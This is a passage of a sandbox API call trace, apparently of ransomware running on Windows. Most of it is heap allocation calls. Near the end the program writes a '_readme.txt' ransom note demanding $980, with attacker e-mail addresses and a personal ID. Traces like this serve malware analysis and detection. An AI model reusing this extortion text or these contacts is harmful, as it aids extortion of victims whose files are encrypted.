Size=0x20) returned 0x9ac1cf8 [0142.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.718] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.718] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.718] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.718] PathFindFileNameW (pszPath="") returned="" [0142.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.718] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.719] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.719] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.719] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.719] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0142.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.719] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0142.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.720] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.720] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.720] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.721] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.721] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.722] CloseHandle (hObject=0x6f0) returned 1 [0142.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 